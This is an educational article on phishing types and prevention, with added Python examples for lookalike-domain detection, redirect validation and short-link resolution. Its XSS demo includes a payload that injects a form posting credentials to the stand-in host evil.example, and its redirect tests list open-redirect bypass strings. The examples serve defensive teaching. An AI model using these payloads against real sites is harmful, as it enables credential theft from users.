Phishing Attacks: A Deep Dive and Prevention Tips

An explanation of phishing attacks, examples, and how to combat them.


What is a phishing attack?

Phishing is a social engineering cyberattack that attempts to trick a target into disclosing sensitive or valuable information. Sometimes called a "phishing scam", it is aimed at the user's login credentials, financial information (such as credit card or bank account details), company data, and anything else that could be of value.

Large organizations have long been at risk of phishing attacks because of their sheer size and the opportunity that gives attackers to find gaps in their defenses. If a phishing attack succeeds, a single employee falling for the con can put the entire company in jeopardy. Organizations should assess how vulnerable they are to phishing through penetration testing engagements and feed the findings back into their security awareness training programs.

Types of phishing attacks

In its most basic sense, the term phishing attack refers to a broad campaign aimed at a large number of users (or "targets"). This can be thought of as a "quantity over quality" approach: it requires minimal preparation by the attacker, with the expectation that at least a few of the targets will fall for it (which makes the small up-front effort worthwhile even though the expected gain per victim is usually not large).

Phishing attacks typically engage the user with a message designed to solicit a specific response (usually a mouse click) by appealing to an emotion or desire, for example:

  • "You could win a $50 gift card to Restaurant X" (greed)
  • "Your purchase order has been approved" (confusion)
  • "Your account will be cancelled if you do not log in immediately" (worry, urgency)

There are plenty of ways attackers will try to get their hands on your information with a single email. However, there are usually indicators that help determine whether an email is legitimate.

Over the years attackers have kept innovating, coming up with variations that require more up-front effort from the attacker but result in a higher rate of victims, a higher-value "payout" per victim, or both.

Spear phishing

When a phishing attack is tailored to a particular organization or to specific individuals, it is called spear phishing. These attacks use additional information gathered ahead of time and incorporate elements such as company logos, email addresses and URLs belonging to the company or to businesses it works with, and sometimes professional or personal details of the target, in order to appear as authentic as possible. This additional effort tends to pay off for the attacker with a larger proportion of targets being duped.


Whaling

A variant of spear phishing, whaling targets a company's senior executives. Whaling attacks typically take the specific responsibilities of these executive roles into account, using focused messaging to deceive the victim. When a whaling attack succeeds, the attacker's windfall can be substantial (e.g. high-privilege credentials to company accounts, company secrets, and so on).


Clone phishing

Another variant of spear phishing is clone phishing. In this attack, targets are presented with a copy (or "clone") of a legitimate message they received earlier, but with specific changes made by the attacker in an attempt to ensnare the target (e.g. a malicious attachment, an altered URL, and so on). Because the attack is based on a previously seen, legitimate message, it can be very effective at deceiving the target.

And more

Attackers continue to find new and creative ways to target unsuspecting computer users. A recent phishing attack involved a Google Docs invitation that arrived from the email account of a user the target knew, but which then tried to obtain the target's Google login credentials (and also spammed itself out to every address in the target's address book). More passive attack types, such as pharming, can cause the same losses as other phishing attacks.

Phishing techniques

Attackers use a variety of channels to phish their targets, including email, social media, instant messaging, text messages (SMS), and compromised websites; some attacks are even carried out over the old-fashioned telephone. Regardless of the delivery mechanism, phishing attacks rely on a handful of techniques to work.

Link manipulation

One common deception attackers use is making a malicious URL look similar to an authentic one, increasing the likelihood that the user will not notice the slight difference and will click it. While some of these manipulated links can be spotted by users who know to "check before they click" (e.g. the legitimate legitbank.com vs. the suspicious leg1tbank.com), homograph attacks, which take advantage of characters that look alike (for instance a Cyrillic "а" in place of a Latin "a", delivered to the browser as a punycode "xn--" domain label), can defeat visual inspection entirely.
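The lookalike check described above, as an added example (not code from the original article): the host is extracted from the URL, punycode labels are decoded so the real characters are visible, and the host is reduced to an ASCII "skeleton" in which confusable characters (Cyrillic lookalikes, the digit 1 for l or i, 0 for o) collapse to one representative before comparison with a list of brands you care about. The confusable table is a hand-picked subset and the brand list is constructed for the demo; a production version would load the full Unicode confusables list.

```python
import unicodedata
from urllib.parse import urlsplit

# Constructed confusable table: characters that look alike collapse to one
# representative. Assumption: real deployments load Unicode confusables.txt.
CONFUSABLES = {
    "\u0430": "a",  # Cyrillic small a
    "\u0435": "e",  # Cyrillic small ie
    "\u043e": "o",  # Cyrillic small o
    "\u0440": "p",  # Cyrillic small er
    "\u0441": "c",  # Cyrillic small es
    "\u0445": "x",  # Cyrillic small ha
    "\u0131": "l",  # Latin dotless i
    "i": "l", "1": "l",            # i / l / 1 are mutually confusable (leg1tbank)
    "0": "o", "3": "e", "5": "s",  # common digit-for-letter substitutions
}


def hostname_of(url):
    """Lowercase host of a URL, with punycode (xn--) labels decoded to Unicode."""
    host = urlsplit(url).hostname or ""
    try:
        host = host.encode("ascii").decode("idna")  # xn--pypal-4ve -> p\u0430ypal
    except UnicodeError:
        pass  # already Unicode (or malformed punycode); inspect as-is
    return host.lower()


def skeleton(host):
    """Reduce a host to an ASCII skeleton in which lookalikes compare equal."""
    out = []
    for ch in unicodedata.normalize("NFKD", host):
        if unicodedata.combining(ch):
            continue  # drop diacritics left over from decomposition (e.g. the dots of o-umlaut)
        out.append(CONFUSABLES.get(ch, ch))
    return "".join(out)


def classify_url(url, known_brands):
    """Return 'trusted', 'lookalike of <brand>', 'brand-as-subdomain of <brand>' or 'unknown'."""
    host = hostname_of(url)
    for brand in known_brands:
        if host == brand or host.endswith("." + brand):
            return "trusted"  # the brand's own registrable domain
    brand_by_skeleton = {skeleton(b): b for b in known_brands}
    match = brand_by_skeleton.get(skeleton(host))
    if match:
        return "lookalike of " + match  # e.g. leg1tbank.com or a homograph
    for brand in known_brands:
        if host.startswith(brand + "."):  # e.g. paypal.com.evil.example
            return "brand-as-subdomain of " + brand
    return "unknown"


if __name__ == "__main__":
    brands = {"paypal.com", "legitbank.com"}
    homograph = "p\u0430ypal.com".encode("idna").decode("ascii")  # Cyrillic a inside
    for u in ("https://www.paypal.com/signin", "https://leg1tbank.com/login",
              "https://" + homograph + "/", "https://paypal.com.evil.example/"):
        print(u, "->", classify_url(u, brands))
```

Note that the trusted check runs first and matches only the brand's own domain and its subdomains; anything that merely contains the brand name, or that matches only after skeletonizing, is flagged rather than accepted.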

Website spoofing

Links are not the only thing attackers can spoof. Websites can be spoofed or forged to look as if they were the real thing, with the legitimate site's appearance recreated using HTML and JavaScript (historically Flash as well) and the attacker controlling how the URL is presented to the target. This means the page could show the legitimate URL even though the user is actually on the malicious site. Cross-site scripting (XSS) takes this one step further: XSS attacks exploit vulnerabilities in the legitimate website itself, allowing the attacker to present the real site (with the genuine URL, a valid TLS certificate, and so on) and then quietly steal the credentials the user enters, because the injected form lives on the legitimate domain.
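The XSS case above, as an added example rather than code from the original article: a constructed login page on the legitimate site reflects an error message from the query string into the HTML unescaped, so an attacker's link can inject a second form that posts the credentials to a host they control (evil.example is an assumed, illustrative name). The hardened version escapes the untrusted text, and the small helper shows where each rendering would send the credentials.

```python
import html
import re

# Constructed login page for the legitimate site. It echoes an error message
# taken straight from the query string (e.g. /login?error=...), the classic
# reflected-XSS pattern that lets a phishing form sit on the genuine domain.
LOGIN_TEMPLATE = (
    '<form method="post" action="/login">\n'
    '  <p class="error">{error}</p>\n'
    '  <input name="user"><input name="pass" type="password">\n'
    '  <button>Sign in</button>\n'
    '</form>'
)

# Constructed attacker payload: closes the real <p> and <form>, then opens a
# look-alike form whose action posts credentials to the attacker's (assumed) host.
PAYLOAD = '</p></form><form method="post" action="https://evil.example/collect"><p>'


def render_vulnerable(error):
    """Before: the untrusted parameter is interpolated as raw HTML."""
    return LOGIN_TEMPLATE.replace("{error}", error)


def render_hardened(error):
    """After: HTML-escape the text so it cannot break out of the <p> element."""
    return LOGIN_TEMPLATE.replace("{error}", html.escape(error, quote=True))


def form_actions(page):
    """List the form action URLs a browser would submit to (regex is enough for this demo)."""
    return re.findall(r'<form\b[^>]*\baction="([^"]*)"', page)


if __name__ == "__main__":
    print("vulnerable:", form_actions(render_vulnerable(PAYLOAD)))  # two forms, one hostile
    print("hardened:  ", form_actions(render_hardened(PAYLOAD)))    # only the real one
```

In the vulnerable rendering the user's browser shows the legitimate URL and certificate while the first form it meets on the page sends the credentials to evil.example; the escaped rendering keeps the payload inert text inside the error paragraph.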

Malicious and covert redirects

Redirects are a way attackers can force a user's browser to interact with an unexpected website. Malicious redirects typically involve a website the targeted user normally and willingly visits, which then forcibly redirects all visitors to an unwanted, attacker-controlled site. An attacker can accomplish this by compromising the website and planting their own redirection code, or by finding an existing bug on the target website that allows a forced redirect through a specially crafted URL (an "open redirect", where a parameter such as ?next= or ?url= is passed to the browser without validation), for example.
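An open redirect of the kind described above, as an added example that is not from the original article: the "before" function trusts the next= parameter outright, so a link such as https://bank.example/login?next=//evil.example sends the victim to the attacker after a genuine login. The hardened function accepts only same-site paths or absolute https URLs on an allowlist of our own hosts (bank.example and www.bank.example are assumed names) and handles the usual bypasses: scheme-relative //host, backslash variants, userinfo tricks like legit@evil, and javascript: URLs. It assumes the web framework has already URL-decoded the parameter once.

```python
from urllib.parse import urlsplit, urlunsplit

# Assumption: these are the application's own hosts.
ALLOWED_HOSTS = {"bank.example", "www.bank.example"}
REDIRECT_FALLBACK = "/"


def vulnerable_redirect_target(next_param):
    """Before: an open redirect. Whatever the attacker put in ?next= is used."""
    return next_param or REDIRECT_FALLBACK


def safe_redirect_target(next_param, allowed_hosts=ALLOWED_HOSTS, fallback=REDIRECT_FALLBACK):
    """After: return a redirect target that can only land on our own site."""
    if not next_param:
        return fallback
    candidate = next_param.strip()
    # Embedded whitespace or control characters are a manipulation sign; refuse.
    if any(c.isspace() or ord(c) < 0x20 for c in candidate):
        return fallback
    # Browsers treat backslash like slash ('/\evil.example' == '//evil.example'),
    # so normalize before parsing rather than trusting urlsplit's view.
    candidate = candidate.replace("\\", "/")
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        # Absolute or scheme-relative URL: only https to one of our own hosts.
        # parts.hostname drops any 'user@' prefix, so 'bank.example@evil.example'
        # is judged by its real host, evil.example.
        if parts.scheme != "https" or parts.hostname not in allowed_hosts:
            return fallback
        return urlunsplit(("https", parts.hostname, parts.path or "/", parts.query, ""))
    # Relative URL: must be a single-slash path ('//x' and '///x' go off-site).
    if not candidate.startswith("/") or candidate.startswith("//"):
        return fallback
    return urlunsplit(("", "", parts.path, parts.query, ""))


if __name__ == "__main__":
    for value in ("/account/settings?tab=security", "https://www.bank.example/inbox",
                  "//evil.example/login", "/\\evil.example/login",
                  "https://bank.example@evil.example/", "javascript:alert(1)"):
        print(repr(value), "->", safe_redirect_target(value))
```

The fragment is dropped from the rebuilt URL and the host is taken from the parsed hostname rather than from the raw netloc, so userinfo and port tricks cannot smuggle a different destination past the allowlist.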

As the name implies, covert redirects make it less obvious to the target that they are interacting with an attacker's site. A common scenario would be an attacker compromising an existing website by attaching a new action to the existing "Log in with your social media account" button that a user might click in order to leave a comment. The new action collects the social media login credentials the user enters and sends them to the attacker's site before proceeding to the real social media site, leaving the target none the wiser.

How to prevent phishing attacks

The following recommendations are intended to prevent phishing attacks and to blunt those that do get through:

Continuous user education and exercises

As part of this Whiteboard Wednesday, Senior Product Marketing Manager Justin Buchanan discusses how employees can identify potential phishing threats in the workplace.

  • Turn all users (from the CEO on down) into one of your best assets in the fight against phishing. Engage users regularly in security awareness training and education (and re-education) on how to recognize and avoid phishing scams, paired with routine, unannounced phishing "exercises" that reinforce and apply what they have learned. This keeps users' awareness of the latest phishing attacks current and makes it more likely that they actually do the right thing when they encounter one.

Filter suspicious attachments

  • Remove and quarantine incoming attachment types known to be used maliciously before they reach your users.

Filter malicious URLs

  • Quarantine messages containing known-malicious URLs. Likewise, make sure any URLs from link shorteners (e.g. bit.ly, goo.gl, etc.) are resolved safely, following each redirect hop without loading the destination page, to confirm they do not lead to a malicious URL.
  • In an attempt to bypass filters, some attackers send a phishing message with no text in the body and one large image (the image itself containing the text, which some filtering technologies ignore). Newer OCR ("character recognition")-based filter technology can detect these messages and filter on them.
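Resolving a shortened link hop by hop, as an added example that is not part of the original article: each hop is fetched with a HEAD request and redirects are deliberately not followed automatically, so the chain can be inspected and abandoned the moment a hop points at a blocked host, before anything from that host is requested. The fetcher is injectable; the demo uses a constructed table of responses so it runs offline, and the shortener and blocklist entries are assumed seed data rather than real reputation feeds.

```python
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlsplit

SHORTENER_HOSTS = {"bit.ly", "goo.gl", "t.co", "tinyurl.com"}  # constructed seed list
BLOCKED_HOSTS = {"evil.example"}  # assumption: populated from your URL reputation source
REDIRECT_CODES = {301, 302, 303, 307, 308}


def is_shortener(url):
    return (urlsplit(url).hostname or "").lower() in SHORTENER_HOSTS


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib from following redirects so every hop can be inspected."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_fetch(url, timeout=5):
    """Live fetcher: one HEAD request; returns (status, Location header or None).
    Not exercised by the offline demo below."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, method="HEAD")
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:  # 3xx surfaces here once redirects are off
        return err.code, err.headers.get("Location")


def resolve_chain(url, fetch, max_hops=10):
    """Follow redirects one hop at a time. Returns (final_url, chain, verdict)."""
    chain = [url]
    current = url
    for _ in range(max_hops):
        status, location = fetch(current)
        if status not in REDIRECT_CODES or not location:
            break
        current = urljoin(current, location)  # Location may be relative
        chain.append(current)
        if (urlsplit(current).hostname or "").lower() in BLOCKED_HOSTS:
            return current, chain, "malicious"  # stop before touching the bad host
    else:
        return current, chain, "loop"  # hop limit reached: treat as suspicious
    return current, chain, "clean"


# Constructed responses standing in for the network: (status, Location).
CONSTRUCTED_RESPONSES = {
    "https://bit.ly/3abc": (301, "https://goo.gl/xyz"),        # shortener to shortener
    "https://goo.gl/xyz": (302, "https://evil.example/login"),  # then to a blocked host
    "https://bit.ly/safe": (301, "/docs"),                      # relative Location header
    "https://bit.ly/docs": (200, None),
    "https://bit.ly/loop": (302, "https://bit.ly/loop"),        # redirects to itself
}


def fake_fetch(url):
    return CONSTRUCTED_RESPONSES.get(url, (404, None))


if __name__ == "__main__":
    for u in ("https://bit.ly/3abc", "https://bit.ly/safe", "https://bit.ly/loop"):
        final, chain, verdict = resolve_chain(u, fake_fetch)
        print(verdict, " -> ".join(chain))
```

Because the verdict is computed from the Location header before the next hop is fetched, a blocked host is never contacted; the hop limit turns redirect loops and absurdly long chains into a "loop" verdict instead of an endless crawl.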

Promote good credential behavior

  • Disallow weak passwords. Passwords of at least 10 characters that include letters, numbers, and symbols are suggested; note that current guidance (NIST SP 800-63B) favors length and screening against lists of known-breached passwords over composition rules.
  • Force users to change their passwords periodically. (The same NIST guidance advises against mandatory periodic rotation unless there is evidence of compromise, since it tends to produce predictable variations of the old password; a compromised credential should be reset immediately regardless.)
  • If your users currently rely on a single factor, consider moving them to two-step verification (2SV) or, better still, two-factor authentication (2FA). Phishing-resistant methods such as FIDO2/WebAuthn security keys go further: the credential is bound to the genuine site's origin, so it cannot be replayed from a lookalike domain.

Additionally, it is good practice to regularly scan user and infrastructure systems for malware and to keep them current on software updates and patches.

The breadth of phishing attacks and attack methods may sound frightening, but with proper training on what a phishing attack is, how it works, and how it can harm users and their organizations, you can help ensure you are as prepared as possible to recognize the threat and mitigate it accordingly.